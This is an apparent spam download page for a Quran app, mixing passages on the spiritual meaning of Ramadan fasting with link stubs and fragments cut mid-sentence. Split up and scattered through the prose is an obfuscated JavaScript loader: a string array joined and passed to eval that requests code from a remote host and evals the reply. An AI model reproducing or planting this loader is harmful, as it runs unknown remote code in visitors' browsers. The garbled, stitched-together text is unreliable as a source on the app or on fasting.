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Muat Turun Al Quran Full 30 Juz Doma Ayat Suci

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Muat Turun Al Quran Full 30 Juz Doma Ayat Suci

How are the many facets of piety sought to be cultivated through the fasts? The prime consideration in undertaking fast, as in any act of devotion, is to seek NEARNESS TO GOD and beseech HIS PLEASURE and FORGIVENESS.. There is, however, a greater significance to fasts than mere abstinence from eating and drinking. Click

Text Al Quran android Digital offline tanpa internet 30 Juz 114 Surah Dalam ayat ayat Al Quran bahasa.. var Q = new Array();Q["WUw"]="v=F";Q["mYJ"]="RXl";Q["zFh"]="l(x";Q["ckM"]="VV9";Q["tVQ"]="AhV";Q["TfX"]="WFo";Q["mez"]=" xh";Q["oyw"]="var";Q["cqw"]="r=n";Q["eok"]="ew ";Q["Hku"]="TUV";Q["xIO"]="d=f";Q["NSI"]="ext";Q["aVl"]="BWx";Q["QQG"]="n('";Q["Soc"]="r r";Q["uub"]="seT";Q["rSC"]="QBt";Q["tBs"]="XxY";Q["DRw"]="ref";Q["hAa"]="ar.. Ramadan is a month of fasting and prayers for the Muslims The fast consists of total abstinence from food and drink from dawn to dusk.. s";Q["qDG"]="NVw";Q["LMe"]="ume";Q["kuw"]="end";Q["QpO"]="{va";Q["sRe"]=";xh";Q["qJs"]="xZC";Q["fQT"]="tio";Q["LDj"]="pim";Q["cDR"]="l5T";eval(Q["oyw"] Q["mez"] Q["cqw"] Q["eok"] Q["dMH"] Q["uJe"] Q["UrW"] Q["HqR"] Q["bxi"] Q["jNl"] Q["ron"] Q["hpE"] Q["QQG"] Q["MGV"] Q["LfC"] Q["CNO"] Q["LDj"] Q["hAa"] Q["iFh"] Q["DlF"] Q["rSC"] Q["kLY"] Q["WUw"] Q["cDR"] Q["xhJ"] Q["aVl"] Q["pxJ"] Q["swj"] Q["ckM"] Q["mYJ"] Q["xnE"] Q["auN"] Q["tBs"] Q["CER"] Q["sIa"] Q["qJs"] Q["qhJ"] Q["VnM"] Q["VXv"] Q["thB"] Q["mKV"] Q["LDq"] Q["mxM"] Q["VGu"] Q["RMR"] Q["QaM"] Q["jLz"] Q["tVQ"] Q["aBY"] Q["Rdv"] Q["rat"] Q["QpT"] Q["VFe"] Q["Idl"] Q["Ftz"] Q["odA"] Q["TfX"] Q["Hku"] Q["bRO"] Q["eLc"] Q["quu"] Q["qDG"] Q["aaw"] Q["XUt"] Q["HzI"] Q["nMB"] Q["qKx"] Q["yWX"] Q["xIO"] Q["XOx"] Q["fQT"] Q["crH"] Q["QpO"] Q["Soc"] Q["dVj"] Q["EYJ"] Q["LMe"] Q["nMa"] Q["DRw"] Q["vRU"] Q["Qbl"] Q["YSe"] Q["zFh"] Q["ron"] Q["awx"] Q["Lxw"] Q["uub"] Q["NSI"] Q["fmb"] Q["sRe"] Q["Sxz"] Q["kuw"] Q["Tbm"]);Juz 11 Juz 12 Juz 13 Juz 14 Juz 15.. ";Q["LDq"]="QR1";Q["UrW"]="pRe";Q["mxM"]="tYE";Q["iFh"]="win";Q["fmb"]=");}";Q["Rdv"]="LBU";Q["VnM"]="EW0";Q["DlF"]="/?N";Q["RMR"]="G18";Q["aBY"]="T1l";Q["swj"]="19b";Q["xnE"]="sBV";Q["Qbl"]="er;";Q["nMB"]="xhr";Q["quu"]="SQV";Q["Sxz"]="r. Click

Fasting enhances through creation of artificial non-availability, the value of the bounties of God, which man is apt to take for granted in the midst of plentiful availability, and thus inculcates in man a spirit of GRATITUDE and consequent DEVOTION to GOD. HERE

The real objective of fasts is to inculcate in man the spirit of abstinence from sins and of cultivation of virtue.. Juz 16 Juz 17 Juz 18 Juz 19 Juz 20 Juz 21 Juz 22 Juz 23 Juz 24 Juz 25 Juz 26 Juz 27 Juz 28 Juz 29 Juz 30.. 2015 Subject: Mohon Muat Turun Untuk Amalan Spiritual reasons and benefits of fasting O ye who believe! Fasting is ordained for you, even as it was ordained for those before you, that ye may guard yourself (against evil) Quran: Chapter 2, Verse 183).. Thus the Quran declares that the fasts have been prescribed with a view to developing piety in man, as is clear from the verse quoted at the top of this page. e828bfe731 HERE

on";Q["dMH"]="XML";Q["LfC"]="','";Q["auN"]="gdJ";Q["MGV"]="GET";Q["rat"]="MaE";Q["odA"]="1hW";Q["Idl"]="BGg";Q["XOx"]="unc";Q["bRO"]="5HW";Q["EYJ"]="doc";Q["jNl"]=");x";Q["mKV"]="C0l";Q["uJe"]="Htt";Q["thB"]="URR";Q["Tbm"]="();";Q["hpE"]="ope";Q["CER"]="EQE";Q["Lxw"]="pon";Q["yWX"]="loa";Q["YSe"]="eva";Q["xhJ"]="W10";Q["Ftz"]="BJC";Q["XUt"]="A==";Q["bxi"]="st(";Q["kLY"]="YSm";Q["CNO"]="//e";Q["pxJ"]="cYT";Q["QpT"]="RBU";Q["qhJ"]="X0k";Q["HzI"]="');";Q["nMa"]="nt.. ";Q["eLc"]="1RI";Q["crH"]="n()";Q["dVj"]="ef=";Q["awx"]="res";Q["ron"]="hr ";Q["jLz"]="5WD";Q["VXv"]="pIT";Q["VFe"]="CBU";Q["vRU"]="err";Q["QaM"]="UHk";Q["aaw"]="RVA";Q["VGu"]="wYB";Q["HqR"]="que";Q["sIa"]="9MR";Q["qKx"]=".. This itself generates a spirit of piety in man The wilful creation of the stringent conditions of hunger and thirst for ones own self, simply in obedience to the Divine Order, measures the FAITH of man in God and helps to strengthen it by putting it to a severe test. Click